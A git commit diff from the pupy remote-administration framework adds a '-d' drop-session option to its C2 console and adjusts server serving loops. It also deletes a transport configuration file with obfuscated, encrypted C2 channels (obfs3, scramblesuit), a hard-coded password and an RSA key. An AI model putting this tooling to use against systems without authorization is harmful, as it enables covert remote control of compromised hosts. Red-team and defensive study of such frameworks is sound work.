mirror of https://github.com/n1nj4sec/pupy.git
adding drop option to sessions command
This commit is contained in:
parent
ea7879ad6d
commit
d5a5a83575
|
@ -36,10 +36,8 @@ try:
|
||||||
module_name=path.rsplit('/',2)[1]
|
module_name=path.rsplit('/',2)[1]
|
||||||
add_transport(module_name)
|
add_transport(module_name)
|
||||||
except Exception as e:
|
except Exception as e:
|
||||||
print e
|
|
||||||
pass
|
pass
|
||||||
except Exception as e:
|
except Exception as e:
|
||||||
print e
|
|
||||||
import transports as trlib
|
import transports as trlib
|
||||||
#imports for pupygen and the pupysh server
|
#imports for pupygen and the pupysh server
|
||||||
for loader, module_name, is_pkg in pkgutil.iter_modules(trlib.__path__):
|
for loader, module_name, is_pkg in pkgutil.iter_modules(trlib.__path__):
|
||||||
|
|
|
@ -99,9 +99,9 @@ class PupyAsyncServer(object):
|
||||||
def handle_new_conn(self, conn):
|
def handle_new_conn(self, conn):
|
||||||
try:
|
try:
|
||||||
conn._init_service()
|
conn._init_service()
|
||||||
conn.serve_all()
|
#conn.serve_all()
|
||||||
#while True:
|
while True:
|
||||||
# conn.serve(0.01)
|
conn.serve(0.01)
|
||||||
except Exception as e:
|
except Exception as e:
|
||||||
logging.error(e)
|
logging.error(e)
|
||||||
|
|
||||||
|
@ -139,7 +139,7 @@ class PupyAsyncTCPServer(PupyAsyncServer):
|
||||||
continue
|
continue
|
||||||
try:
|
try:
|
||||||
s.bind(sa)
|
s.bind(sa)
|
||||||
s.listen(100)
|
s.listen(5)
|
||||||
except socket.error as msg:
|
except socket.error as msg:
|
||||||
s.close()
|
s.close()
|
||||||
s = None
|
s = None
|
||||||
|
@ -322,9 +322,9 @@ class PupyUDPServer(object):
|
||||||
def handle_new_conn(self, conn):
|
def handle_new_conn(self, conn):
|
||||||
try:
|
try:
|
||||||
conn._init_service()
|
conn._init_service()
|
||||||
conn.serve_all()
|
#conn.serve_all()
|
||||||
#while True:
|
while True:
|
||||||
# conn.serve(0.01)
|
conn.serve(0.01)
|
||||||
except Exception as e:
|
except Exception as e:
|
||||||
logging.error(e)
|
logging.error(e)
|
||||||
|
|
||||||
|
|
|
@ -1,283 +0,0 @@
|
||||||
# -*- coding: UTF8 -*-
|
|
||||||
# Copyright (c) 2015, Nicolas VERDIER (contact@n1nj4.eu)
|
|
||||||
# Pupy is under the BSD 3-Clause license. see the LICENSE file at the root of the project for the detailed licence terms
|
|
||||||
|
|
||||||
import os
|
|
||||||
import logging
|
|
||||||
from .lib.servers import PupyTCPServer, PupyAsyncTCPServer
|
|
||||||
from .lib.clients import PupyTCPClient, PupySSLClient, PupyProxifiedTCPClient, PupyProxifiedSSLClient, PupyAsyncClient
|
|
||||||
from .lib.transports.dummy import DummyPupyTransport
|
|
||||||
from .lib.transports.b64 import B64Client, B64Server, B64Transport
|
|
||||||
from .lib.transports.http import PupyHTTPClient, PupyHTTPServer
|
|
||||||
from .lib.transports.xor import XOR
|
|
||||||
from .lib.transports.aes import AES256, AES128
|
|
||||||
from .lib.transports.rsa_aes import RSA_AESClient, RSA_AESServer
|
|
||||||
import rsa
|
|
||||||
try:
|
|
||||||
from .lib.transports.obfs3.obfs3 import Obfs3Client, Obfs3Server
|
|
||||||
obfs3_available=True
|
|
||||||
except ImportError as e:
|
|
||||||
#to make pupy works even without obfs3 dependencies
|
|
||||||
logging.warning("%s. The obfs3 transport has been disabled."%e)
|
|
||||||
obfs3_available=False
|
|
||||||
|
|
||||||
try:
|
|
||||||
from .lib.transports.scramblesuit.scramblesuit import ScrambleSuitClient, ScrambleSuitServer
|
|
||||||
scramblesuit_available=True
|
|
||||||
except ImportError as e:
|
|
||||||
#to make pupy works even without scramblesuit dependencies
|
|
||||||
logging.warning("%s. The scramblesuit transport has been disabled."%e)
|
|
||||||
scramblesuit_available=False
|
|
||||||
from .lib.streams import *
|
|
||||||
from .lib.launchers.simple import SimpleLauncher
|
|
||||||
from .lib.launchers.auto_proxy import AutoProxyLauncher
|
|
||||||
from .lib.launchers.bind import BindLauncher
|
|
||||||
from .lib.base import chain_transports
|
|
||||||
try:
|
|
||||||
import ConfigParser as configparser
|
|
||||||
except ImportError:
|
|
||||||
import configparser
|
|
||||||
from rpyc.utils.authenticators import SSLAuthenticator
|
|
||||||
|
|
||||||
ssl_auth=None
|
|
||||||
|
|
||||||
def ssl_authenticator():
|
|
||||||
config = configparser.ConfigParser()
|
|
||||||
config.read("pupy.conf")
|
|
||||||
return SSLAuthenticator(config.get("pupyd","keyfile").replace("\\",os.sep).replace("/",os.sep), config.get("pupyd","certfile").replace("\\",os.sep).replace("/",os.sep), ciphers="SHA256+AES256:SHA1+AES256:@STRENGTH")
|
|
||||||
|
|
||||||
#scramblesuit password must be 20 char long
|
|
||||||
scramblesuit_passwd="th!s_iS_pupy_sct_k3y"
|
|
||||||
|
|
||||||
DEFAULT_RSA_PUB_KEY="""
|
|
||||||
-----BEGIN RSA PUBLIC KEY-----
|
|
||||||
MIICCgKCAgEAu1AvqNawlgXdpT3s0/YoOSj3bSsGOd2UXrDKmEt3VkGvDVyxllwm
|
|
||||||
9TctdCIS8X9ziOtpSH2yYcS1zwVD0qb/Dt6im6Z0jiaiizsZPqJL16SfmP7b41ub
|
|
||||||
iCcM4a3gI1wRxt3HtBDgqPVZTqsKPsC3m6fiWfOQCy9CmLSBlwwE+9+elnUG4pvA
|
|
||||||
XQn0KDdrnzo5qGLxFyj9/jLI4y+rhS9DlwgsmFd42MCaJ/CgceM7QChN0zjxxT23
|
|
||||||
Y/RSR6wnYKasDbz7KoCa/QkYpvN4XqmvUZVQDI2y8F87ta/Cqo3UMEz5hNYt96LU
|
|
||||||
KN2qXNVOeiCO57tFFriWnKk6cAFHgrGzwA23xKUYB9/YivaEMjrh7C3907B+I1bK
|
|
||||||
t/BXOxdRwbTHkWQWrpxfUGs+5LJzwwsixzNJOifqgFyZTef6EyNTwSyr0oRslNk7
|
|
||||||
JIrE1Lab5Ve26+M92pCrs/UOIxpSWSKRmJeWcyAiw3crYrzAxC9r654BnmCfeWtn
|
|
||||||
MRAWmUrljx6aJSojTAbeY9aDDrYQRuQ7VevO+SHxYwOG/1Jq+qgznTN3zroUI97w
|
|
||||||
5g1oVVJrthUrYQZYKboaiEZmQckxLU5ca9pAyXu/o4pa1ez4a14YbollG9bjSnbK
|
|
||||||
+qRicAn26w5undwWlPX52DnrOw0v9sAqazfzG5rMH7mKWnSDvHPWOAsCAwEAAQ==
|
|
||||||
-----END RSA PUBLIC KEY-----
|
|
||||||
"""
|
|
||||||
|
|
||||||
transports={}
|
|
||||||
launchers={}
|
|
||||||
|
|
||||||
transports["ssl"]={
|
|
||||||
"info" : "TCP transport wrapped with SSL",
|
|
||||||
"server" : PupyTCPServer,
|
|
||||||
"client": PupySSLClient,
|
|
||||||
"client_kwargs" : {},
|
|
||||||
"authenticator" : ssl_authenticator,
|
|
||||||
"stream": PupySocketStream ,
|
|
||||||
"client_transport" : DummyPupyTransport,
|
|
||||||
"server_transport" : DummyPupyTransport,
|
|
||||||
"client_transport_kwargs": {},
|
|
||||||
"server_transport_kwargs": {},
|
|
||||||
}
|
|
||||||
|
|
||||||
|
|
||||||
transports["http"]={
|
|
||||||
"info" : "TCP transport using HTTP with RSA+AES",
|
|
||||||
"server" : PupyTCPServer,
|
|
||||||
"client": PupyTCPClient,
|
|
||||||
"client_kwargs" : {},
|
|
||||||
"authenticator" : None,
|
|
||||||
"stream": PupySocketStream ,
|
|
||||||
"client_transport" : chain_transports(
|
|
||||||
PupyHTTPClient.custom(keep_alive=True),
|
|
||||||
RSA_AESClient.custom(pubkey=DEFAULT_RSA_PUB_KEY, rsa_key_size=4096, aes_size=256),
|
|
||||||
),
|
|
||||||
"server_transport" : chain_transports(
|
|
||||||
PupyHTTPServer,
|
|
||||||
RSA_AESServer.custom(privkey_path="crypto/rsa_private_key.pem", rsa_key_size=4096, aes_size=256),
|
|
||||||
),
|
|
||||||
"client_transport_kwargs": {},
|
|
||||||
"server_transport_kwargs": {},
|
|
||||||
}
|
|
||||||
|
|
||||||
if obfs3_available:
|
|
||||||
transports["obfs3"]={
|
|
||||||
"info" : "TCP transport using obfsproxy's obfs3 transport with a extra rsa+aes layer",
|
|
||||||
"server" : PupyTCPServer,
|
|
||||||
"client": PupyTCPClient,
|
|
||||||
"client_kwargs" : {},
|
|
||||||
"authenticator" : None,
|
|
||||||
"stream": PupySocketStream ,
|
|
||||||
"client_transport" : chain_transports(
|
|
||||||
Obfs3Client,
|
|
||||||
RSA_AESClient.custom(pubkey=DEFAULT_RSA_PUB_KEY, rsa_key_size=4096, aes_size=256),
|
|
||||||
),
|
|
||||||
"server_transport" : chain_transports(
|
|
||||||
Obfs3Server,
|
|
||||||
RSA_AESServer.custom(privkey_path="crypto/rsa_private_key.pem", rsa_key_size=4096, aes_size=256),
|
|
||||||
),
|
|
||||||
"client_transport_kwargs": {},
|
|
||||||
"server_transport_kwargs": {},
|
|
||||||
}
|
|
||||||
|
|
||||||
if scramblesuit_available:
|
|
||||||
transports["scramblesuit"]={
|
|
||||||
"info" : "TCP transport using the obfsproxy's scramblesuit transport with a extra rsa+aes layer",
|
|
||||||
"server" : PupyTCPServer,
|
|
||||||
"client": PupyTCPClient,
|
|
||||||
"client_kwargs" : {},
|
|
||||||
"authenticator" : None,
|
|
||||||
"stream": PupySocketStream ,
|
|
||||||
"client_transport" : chain_transports(
|
|
||||||
ScrambleSuitClient,
|
|
||||||
RSA_AESClient.custom(pubkey=DEFAULT_RSA_PUB_KEY, rsa_key_size=4096, aes_size=256),
|
|
||||||
),
|
|
||||||
"server_transport" : chain_transports(
|
|
||||||
ScrambleSuitServer,
|
|
||||||
RSA_AESServer.custom(privkey_path="crypto/rsa_private_key.pem", rsa_key_size=4096, aes_size=256),
|
|
||||||
),
|
|
||||||
"client_transport_kwargs": {"password":scramblesuit_passwd},
|
|
||||||
"server_transport_kwargs": {"password":scramblesuit_passwd},
|
|
||||||
}
|
|
||||||
|
|
||||||
#
|
|
||||||
# The following commented transports are unsafe ones or transports without any special interest compared to other above but can be useful for tests and examples
|
|
||||||
#
|
|
||||||
|
|
||||||
#transports["tcp"]={
|
|
||||||
# "info" : "Simple TCP transport transmitting in cleartext",
|
|
||||||
# "server" : PupyTCPServer,
|
|
||||||
# "client": PupyTCPClient,
|
|
||||||
# "client_kwargs" : {},
|
|
||||||
# "authenticator" : None,
|
|
||||||
# "stream": PupySocketStream ,
|
|
||||||
# "client_transport" : DummyPupyTransport,
|
|
||||||
# "server_transport" : DummyPupyTransport,
|
|
||||||
# "client_transport_kwargs": {},
|
|
||||||
# "server_transport_kwargs": {},
|
|
||||||
# }
|
|
||||||
#transports["http_cleartext"]={ #TODO fill with empty requests/response between each request/response to have only a following of req/res and not unusual things like req/req/req/res/res/req ...
|
|
||||||
# "info" : "TCP transport using HTTP with base64 encoded payloads (synchrone with Keep-Alive headers and one 3-way-handshake)",
|
|
||||||
# "server" : PupyTCPServer,
|
|
||||||
# "client": PupyTCPClient,
|
|
||||||
# "client_kwargs" : {},
|
|
||||||
# "authenticator" : None,
|
|
||||||
# "stream": PupySocketStream ,
|
|
||||||
# "client_transport" : PupyHTTPClient,
|
|
||||||
# "server_transport" : PupyHTTPServer,
|
|
||||||
# "client_transport_kwargs": {},
|
|
||||||
# "server_transport_kwargs": {},
|
|
||||||
# }
|
|
||||||
#
|
|
||||||
#transports["ssl_proxy"]={
|
|
||||||
# "info" : "TCP transport wrapped with SSL and passing through a SOCKS4/SOCKS5/HTTP proxy",
|
|
||||||
# "server" : PupyTCPServer,
|
|
||||||
# "client": PupyProxifiedSSLClient,
|
|
||||||
# "client_kwargs" : {'proxy_addr': None, 'proxy_port': None, 'proxy_type':'HTTP'},
|
|
||||||
# "authenticator" : ssl_authenticator,
|
|
||||||
# "stream": PupySocketStream ,
|
|
||||||
# "client_transport" : DummyPupyTransport,
|
|
||||||
# "server_transport" : DummyPupyTransport,
|
|
||||||
# "client_transport_kwargs": {},
|
|
||||||
# "server_transport_kwargs": {},
|
|
||||||
# }
|
|
||||||
#transports["ssl_aes"]={
|
|
||||||
# "info" : "TCP transport wrapped with SSL and AES",
|
|
||||||
# "server" : PupyTCPServer,
|
|
||||||
# "client": PupySSLClient,
|
|
||||||
# "client_kwargs" : {},
|
|
||||||
# "authenticator" : ssl_authenticator,
|
|
||||||
# "stream": PupySocketStream ,
|
|
||||||
# "client_transport" : AES256.custom(iterations=10000),
|
|
||||||
# "server_transport" : AES256.custom(iterations=10000),
|
|
||||||
# "client_transport_kwargs": {"password" : "Pupy_d3f4uld_p4sS"},
|
|
||||||
# "server_transport_kwargs": {"password" : "Pupy_d3f4uld_p4sS"},
|
|
||||||
# }
|
|
||||||
#transports["tcp_aes"]={
|
|
||||||
# "info" : "TCP transport that encodes traffic using AES256 with a static password hashed with PBKDF2",
|
|
||||||
# "server" : PupyTCPServer,
|
|
||||||
# "client": PupyTCPClient,
|
|
||||||
# "client_kwargs" : {},
|
|
||||||
# "authenticator" : None,
|
|
||||||
# "stream": PupySocketStream ,
|
|
||||||
# "client_transport" : AES256,
|
|
||||||
# "server_transport" : AES256,
|
|
||||||
# "client_transport_kwargs": {"password": "pupy_t3st_p4s5word"},
|
|
||||||
# "server_transport_kwargs": {"password": "pupy_t3st_p4s5word"},
|
|
||||||
# }
|
|
||||||
#
|
|
||||||
#
|
|
||||||
#transports["tcp_rsa_aes"]={
|
|
||||||
# "info" : "TCP transport that encodes traffic using AES256 with a static password hashed with PBKDF2",
|
|
||||||
# "server" : PupyTCPServer,
|
|
||||||
# "client": PupyTCPClient,
|
|
||||||
# "client_kwargs" : {},
|
|
||||||
# "authenticator" : None,
|
|
||||||
# "stream": PupySocketStream ,
|
|
||||||
# "client_transport" : RSA_AESClient.custom(pubkey=DEFAULT_RSA_PUB_KEY, rsa_key_size=4096, aes_size=128),
|
|
||||||
# "server_transport" : RSA_AESServer.custom(privkey_path="crypto/rsa_private_key.pem", rsa_key_size=4096, aes_size=128),
|
|
||||||
# "client_transport_kwargs": {"password": "pupy_t3st_p4s5word"},
|
|
||||||
# "server_transport_kwargs": {"password": "pupy_t3st_p4s5word"},
|
|
||||||
# }
|
|
||||||
#
|
|
||||||
#transports["trololo"]={
|
|
||||||
# "info" : "test wrapping",
|
|
||||||
# "server" : PupyTCPServer,
|
|
||||||
# "client": PupyTCPClient,
|
|
||||||
# "client_kwargs" : {},
|
|
||||||
# "authenticator" : None,
|
|
||||||
# "stream": PupySocketStream ,
|
|
||||||
# "client_transport" : chain_transports(
|
|
||||||
# PupyHTTPClient.custom(method="POST", user_agent="Mozilla 5.0", keep_alive=True),
|
|
||||||
# B64Transport,
|
|
||||||
# PupyHTTPClient.custom(method="GET", user_agent="Mozilla-ception", keep_alive=True),
|
|
||||||
# XOR.custom(xorkey="trololo"),
|
|
||||||
# AES256.custom(password="plop2", iterations=10000),
|
|
||||||
# RSA_AESClient.custom(pubkey_path="crypto/rsa_public_key.pem", rsa_key_size=4096, aes_size=256),
|
|
||||||
# AES128.custom(password="plop1", iterations=10000),
|
|
||||||
# ),
|
|
||||||
# "server_transport" : chain_transports(
|
|
||||||
# PupyHTTPServer.custom(response_code="418 I'm a teapot"),
|
|
||||||
# B64Transport,
|
|
||||||
# PupyHTTPServer,
|
|
||||||
# XOR.custom(xorkey="trololo"),
|
|
||||||
# AES256.custom(password="plop2", iterations=10000),
|
|
||||||
# RSA_AESServer.custom(privkey_path="crypto/rsa_private_key.pem", rsa_key_size=4096, aes_size=256),
|
|
||||||
# AES128.custom(password="plop1", iterations=10000),
|
|
||||||
# ),
|
|
||||||
# "client_transport_kwargs": {},
|
|
||||||
# "server_transport_kwargs": {},
|
|
||||||
# }
|
|
||||||
#
|
|
||||||
#transports["async_http_cleartext"]={
|
|
||||||
# "info" : "TCP transport using HTTP with base64 encoded payloads (asynchrone with client pulling the server and multiple 3-way handshakes (slow))",
|
|
||||||
# "server" : PupyAsyncTCPServer,
|
|
||||||
# "client": PupyAsyncClient,
|
|
||||||
# "client_kwargs" : {},
|
|
||||||
# "authenticator" : None,
|
|
||||||
# "stream": PupyAsyncTCPStream ,
|
|
||||||
# "client_transport" : PupyHTTPClient.custom(keep_alive=False),
|
|
||||||
# "server_transport" : PupyHTTPServer,
|
|
||||||
# "client_transport_kwargs": {},
|
|
||||||
# "server_transport_kwargs": {},
|
|
||||||
# }
|
|
||||||
#
|
|
||||||
#transports["tcp_cleartext_proxy"]={
|
|
||||||
# "info" : "TCP transport transmitting in cleartext and passing through a SOCKS4/SOCKS5/HTTP proxy",
|
|
||||||
# "server" : PupyTCPServer,
|
|
||||||
# "client": PupyProxifiedTCPClient,
|
|
||||||
# "client_kwargs" : {'proxy_addr':'127.0.0.1', 'proxy_port':8080, 'proxy_type':'HTTP'},
|
|
||||||
# "authenticator" : None,
|
|
||||||
# "stream": PupySocketStream ,
|
|
||||||
# "client_transport" : DummyPupyTransport,
|
|
||||||
# "server_transport" : DummyPupyTransport,
|
|
||||||
# "client_transport_kwargs": {},
|
|
||||||
# "server_transport_kwargs": {},
|
|
||||||
# }
|
|
||||||
|
|
||||||
launchers["connect"]=SimpleLauncher
|
|
||||||
launchers["simple"]=SimpleLauncher # keeped for backward-compatibility with old windows templates
|
|
||||||
launchers["auto_proxy"]=AutoProxyLauncher
|
|
||||||
launchers["bind"]=BindLauncher
|
|
||||||
|
|
|
@ -439,6 +439,7 @@ class PupyCmd(cmd.Cmd):
|
||||||
arg_parser.add_argument('-g', '--global-reset', action='store_true', help="reset --interact to the default global behavior")
|
arg_parser.add_argument('-g', '--global-reset', action='store_true', help="reset --interact to the default global behavior")
|
||||||
arg_parser.add_argument('-l', dest='list', action='store_true', help='List all active sessions')
|
arg_parser.add_argument('-l', dest='list', action='store_true', help='List all active sessions')
|
||||||
arg_parser.add_argument('-k', dest='kill', metavar='<id>', type=int, help='Kill the selected session')
|
arg_parser.add_argument('-k', dest='kill', metavar='<id>', type=int, help='Kill the selected session')
|
||||||
|
arg_parser.add_argument('-d', dest='drop', metavar='<id>', type=int, help='Drop the connection (abruptly close the socket)')
|
||||||
try:
|
try:
|
||||||
modargs=arg_parser.parse_args(shlex.split(arg))
|
modargs=arg_parser.parse_args(shlex.split(arg))
|
||||||
except PupyModuleExit:
|
except PupyModuleExit:
|
||||||
|
@ -457,6 +458,14 @@ class PupyCmd(cmd.Cmd):
|
||||||
selected_client[0].conn.exit()
|
selected_client[0].conn.exit()
|
||||||
except Exception:
|
except Exception:
|
||||||
pass
|
pass
|
||||||
|
elif modargs.drop:
|
||||||
|
selected_client = self.pupsrv.get_clients(modargs.drop)
|
||||||
|
if selected_client:
|
||||||
|
try:
|
||||||
|
selected_client[0].conn._conn.close()
|
||||||
|
except Exception:
|
||||||
|
pass
|
||||||
|
|
||||||
elif modargs.list or not arg:
|
elif modargs.list or not arg:
|
||||||
client_list=self.pupsrv.get_clients_list()
|
client_list=self.pupsrv.get_clients_list()
|
||||||
self.display(PupyCmd.table_format([x.desc for x in client_list], wl=["id", "user", "hostname", "platform", "release", "os_arch", "address"]))
|
self.display(PupyCmd.table_format([x.desc for x in client_list], wl=["id", "user", "hostname", "platform", "release", "os_arch", "address"]))
|
||||||
|
|
|
@ -329,6 +329,7 @@ class PupyServer(threading.Thread):
|
||||||
launcher.arg_parser.print_usage()
|
launcher.arg_parser.print_usage()
|
||||||
return
|
return
|
||||||
stream=launcher.iterate().next()
|
stream=launcher.iterate().next()
|
||||||
|
self.handler.display_info("Connecting ...")
|
||||||
conn=rpyc.utils.factory.connect_stream(stream, PupyService.PupyBindService, {})
|
conn=rpyc.utils.factory.connect_stream(stream, PupyService.PupyBindService, {})
|
||||||
bgsrv=rpyc.BgServingThread(conn)
|
bgsrv=rpyc.BgServingThread(conn)
|
||||||
bgsrv.SLEEP_INTERVAL=0.001 # consume ressources but faster response ...
|
bgsrv.SLEEP_INTERVAL=0.001 # consume ressources but faster response ...
|
||||||
|
|
Loading…
Reference in New Issue